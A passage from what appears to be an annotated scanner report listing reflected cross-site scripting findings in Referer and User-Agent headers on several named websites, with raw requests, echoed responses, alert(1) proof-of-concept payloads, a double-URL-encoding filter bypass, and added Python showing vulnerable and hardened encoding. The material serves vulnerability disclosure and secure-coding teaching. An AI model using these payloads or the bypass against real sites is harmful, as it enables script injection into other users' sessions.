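        ('4.252', SAMPLE_COMMENT, 'f0c0c', '--><script>alert(1)</script>', 'ab07c28887'),
        ('encoded', SAMPLE_ENCODED, 'ea62e', '"><script>alert(1)</script>', '30ad732db68'),
    ]:
        for f in classify_reflections(body, prefix, meta, suffix):
            print(name, f['context'], 'unmodified' if f['echoed_unmodified'] else 'encoded')
```

The 4.247 body yields two echoes: the one inside addthis_url still carries the double-encoded bytes and is reported as encoded, while the one inside addthis_title is the decoded `";alert(1)//` and is the reflection the scanner rated "Certain". The encoded variant shows the negative case: same attribute context, but the quote and angle brackets arrive as entities, so there is no injection.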

4.247. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527 was submitted in the Referer HTTP header. This input was echoed as ece2b";alert(1)//c7db6d31527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character. This pattern usually means the value is URL-decoded once before the filter inspects it and decoded again before it is written into the page: %2522 passes the check as the harmless %22 and only becomes a " at the sink.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. The Referer header is a weaker barrier than most other headers, however: a browser fills it in from the URL of the page that issued the request, so an attacker who hosts a page whose own URL carries the payload in its query string and sends the victim from there to /bookmark.php gets the header supplied by the victim's browser. That applies directly to this finding, because the double-encoded payload contains only URL-safe characters that browsers forward as-is; the raw quotes and angle brackets used in the neighbouring findings may or may not survive the browser's URL normalisation. (Current default referrer policies also strip the path and query from cross-origin Referer values, which was not the case when this report was generated.)

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94421

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527";addthis_title="ece2b";alert(1)//c7db6d31527 - 1 search";
var services = { 'naszaklasa':"Nasza-klasa", 'tuenti':"Tuenti", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97a
...[SNIP]...
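
The double-decoding bypass in this finding, and the fix for it, as an added example written for this page rather than code from the report or from AddThis. The report does not show the server-side code, so the filter is a hypothetical reconstruction of the observed behaviour: it URL-decodes once and rejects quote characters (the blocklist is limited to quotes because finding 4.245 shows a raw `<script>` reaching the same sink), while the rendering path decodes a second time before dropping the value into the double-quoted addthis_title string. The hardened version decodes exactly once and then encodes for the JavaScript-string context, which also neutralises `</script>` break-outs.

```python
import json
from urllib.parse import unquote

BLOCKED = '"\''   # assumed blocklist: quotes only, since '<' is seen reaching the page raw


def quote_filter_passes(q: str) -> bool:
    """Hypothetical filter: decode once, then reject anything containing a quote."""
    return not any(c in BLOCKED for c in unquote(q))


def vulnerable_title(q: str):
    """Models the reported behaviour: filter on the once-decoded value, then decode
    again before building the JS string. Returns None when the filter blocks the input."""
    if not quote_filter_passes(q):
        return None
    title = unquote(unquote(q))          # second decode turns %22 into "
    return f'addthis_title="{title} - 1 search";'


def js_string_literal(value: str) -> str:
    """Encode a value for use inside a <script> block as a JS string literal.
    json.dumps escapes quotes, backslashes and control characters; the extra
    replacements keep '</script>' and entity-like sequences from appearing verbatim."""
    out = json.dumps(value)
    return out.replace('<', '\\u003c').replace('>', '\\u003e').replace('&', '\\u0026')


def hardened_title(q: str) -> str:
    """Decode exactly once, then encode for the sink instead of blocklisting input."""
    title = unquote(q)
    return 'addthis_title=' + js_string_literal(title + ' - 1 search') + ';'


if __name__ == '__main__':
    # Constructed probes: the report's double-encoded payload, its single-encoded form,
    # the raw form, and the </script> break-out from finding 4.245.
    for probe in ('ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527',
                  'ece2b%22%3balert%281%29%2f%2fc7db6d31527',
                  'ece2b";alert(1)//c7db6d31527',
                  'f4f87%3C/script%3E06934d90575'):
        print('vulnerable:', vulnerable_title(probe))
        print('hardened:  ', hardened_title(probe))
```

Only the double-encoded probe gets through the modelled filter, and it comes out as the exact `addthis_title="ece2b";alert(1)//c7db6d31527 - 1 search";` shown in the response above. The hardened function never rejects input; it makes the quote a `\"` and the angle brackets `\u003c`/`\u003e`, so the same bytes are harmless whichever way the attacker encodes them.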

4.248. http://www.arto.com/section/linkshare/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arto.com
Path:   /section/linkshare/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc373"><script>alert(1)</script>717b898a5ba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /section/linkshare/ HTTP/1.1
Host: www.arto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dc373"><script>alert(1)</script>717b898a5ba
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vk3qrvl2i3b2gcvub5mipplt; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 14:21:03 GMT
Connection: close
Content-Length: 40025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dc373"><script>alert(1)</script>717b898a5ba" />
...[SNIP]...

4.249. http://www.arto.com/section/user/login/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arto.com
Path:   /section/user/login/

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9921f"><script>alert(1)</script>6df948c2fd9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /section/user/login/?destination=http%3a%2f%2fwww.arto.com%2fsection%2flinkshare%2fdefault.aspx HTTP/1.1
Host: www.arto.com
Proxy-Connection: keep-alive
Referer: http://burp/show/53
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.169921f"><script>alert(1)</script>6df948c2fd9
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0cj2vqxnas50saq4rab4bmqt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 17 Apr 2011 15:00:58 GMT
Content-Length: 40005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<input type="hidden" name="__USERAGENT" id="__USERAGENT" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.169921f"><script>alert(1)</script>6df948c2fd9" />
...[SNIP]...

4.250. http://www.automasterlandrover.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba8b"><script>alert(1)</script>c5f2daa69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.automasterlandrover.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4ba8b"><script>alert(1)</script>c5f2daa69

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:21:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d606fa404638d9008b915da9d34eb2;path=/
Set-Cookie: JSESSIONID=1o9ay8sxhs37r;path=/
Set-Cookie: ddcpoolid=CmsPoolN;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 43184

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=4ba8b"><script>alert(1)</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/index.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=
...[SNIP]...

4.251. http://www.automasterlandrover.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5183d'-alert(1)-'57160338b5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.automasterlandrover.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5183d'-alert(1)-'57160338b5

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:21:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d60b7e404638d9008b915d7c8aee19;path=/
Set-Cookie: JSESSIONID=6u915eujlgvi1;path=/
Set-Cookie: ddcpoolid=CmsPoolN;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 43156

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=5183d'-alert(1)-'57160338b5',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.252. http://www.compusa.com/applications/SearchTools/search.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /applications/SearchTools/search.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f0c0c--><script>alert(1)</script>ab07c28887 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /applications/SearchTools/search.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 14:21:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=71; path=/
Set-Cookie: SRVR=WEBX23%2D04A; path=/
Set-Cookie: Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ESYX+Venture+VX9+Series+Custom+Desktop+PC%3E%3EEdpNo%3D5688178%5ED%3E%3EGarmin+Nuvi+1490T+5%22+GPS+w%2FTraffic%2FBT+%2D+RB%3E%3EEdpNo%3D5589658%5ED%3E%3EFantom+2TB+G%2DForce+External+Hard+Drive%3E%3EEdpNo%3D5384378&Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2FSearchTools%2Ffailedsearch%2Easp%3Fkeywords%3D&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Df0c0c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eab07c28887&PHRoutine=10; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=1127875020110417102130173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Content-Length: 112869


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="CompUSA.com is your complete online headquarters for computer products at
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887-->
...[SNIP]...
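
The two remaining sink types in this section are the double-quoted attribute value (findings 4.246 and 4.248 to 4.250, where `">` closes the attribute and the tag) and the HTML comment (this finding and 4.253, where `-->` closes the comment). The Python below is an added example written for this page, not code from the report or from any of the sites named in it: two hypothetical template functions stand in for the server-side code behind the `value="..."` and `<!--Cart(Referer) ...-->` sinks, each rendered unencoded and encoded, with a check that tells whether the injected value can terminate its container. The Referer values are the ones from findings 4.246 and 4.252.

```python
import html


def attr_value(value: str) -> str:
    """Encode for a double-quoted HTML attribute. With quote=True, & < > " and '
    all become entities, so the value can neither close the attribute nor the tag."""
    return html.escape(value, quote=True)


def comment_text(value: str) -> str:
    """Encode for the body of an HTML comment. A comment ends at the first '-->'
    (browsers also honour '--!>') and there is no escape sequence inside one, so
    turning every '>' into &gt; is what keeps a terminator from forming."""
    return html.escape(value, quote=False)


def render_hidden_input(referer: str, safe: bool) -> str:
    """Hypothetical stand-in for the template behind the value="..." sink."""
    v = attr_value(referer) if safe else referer
    return f'<input type="hidden" id="url" name="url" value="{v}" />'


def render_referer_comment(referer: str, safe: bool) -> str:
    """Hypothetical stand-in for the template behind the <!--Cart(Referer) ...--> sink."""
    v = comment_text(referer) if safe else referer
    return f'<!--Cart(Referer) :{v}-->'


def attribute_terminates_early(markup: str) -> bool:
    """True when a raw '"' sits inside the value, i.e. the attribute can be closed
    and new markup started (the '">' in the probes above)."""
    start = markup.index('value="') + len('value="')
    end = markup.rindex('" />')
    return '"' in markup[start:end]


def comment_terminates_early(markup: str) -> bool:
    """True when the comment body already contains a terminator before the real one."""
    body = markup[len('<!--'):-len('-->')]
    return '-->' in body or '--!>' in body


# Constructed inputs, using the Referer values from findings 4.246 and 4.252.
REFERER_ATTR = 'http://www.google.com/search?hl=en&q=ea62e"><script>alert(1)</script>30ad732db68'
REFERER_COMMENT = 'http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887'

if __name__ == '__main__':
    for safe in (False, True):
        print('attribute, safe=%s:' % safe,
              attribute_terminates_early(render_hidden_input(REFERER_ATTR, safe)))
        print('comment, safe=%s:' % safe,
              comment_terminates_early(render_referer_comment(REFERER_COMMENT, safe)))
```

Entity-encoding the comment body stops the break-out but still leaves `--` inside the comment, which the HTML specification disallows even though browsers tolerate it; the better fix for the CompUSA sink is not to write request headers into served markup at all, since the comment serves no purpose for the user.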

4.253. http://www.compusa.com/cgi-bin/order.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 24a87--><script>alert(1)</script>ec22dac0bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=24a87--><script>alert(1)</script>ec22dac0bbf

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 14:21:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=A&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=63; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=3626439220110417102129173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eec22dac0bbf&PHRoutine=10; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX22%2D01A; path=/
Content-Length: 79761


<!--v1-->
<!--Domain :: compusa.com-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.compusa.com-->
<!--ContinueShoppingURL :: /applications/searchtools/item-details
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=24a87--><script>alert(1)</script>ec22dac0bbf-->
...[SNIP]...

4.254. http://www.eset.com/online-scanner [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5b9c"-alert(1)-"b05d62e2351 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /online-scanner HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=d5b9c"-alert(1)-"b05d62e2351

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=l77gn0qk2vii6glnvvfjiehd24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 20733
Date: Sun, 17 Apr 2011 12:55:02 GMT
X-Varnish: 1857986357
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=d5b9c"-alert(1)-"b05d62e2351";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.255. http://www.eset.com/online-scanner/help [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner/help

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79440"-alert(1)-"b598b50e2ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /online-scanner/help HTTP/1.1
Host: www.eset.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.2.10.1303044897; mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757;
Referer: http://www.google.com/search?hl=en&q=79440"-alert(1)-"b598b50e2ed

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 13150
Date: Sun, 17 Apr 2011 14:15:44 GMT
X-Varnish: 1858168923
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>F
...[SNIP]...
nel on
the next lines. */
s.pageName="";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=79440"-alert(1)-"b598b50e2ed";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

4.256. http://www.eset.com/online-scanner/run [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.eset.com
Path:   /online-scanner/run

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 745d9"-alert(1)-"b96c10ee407 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

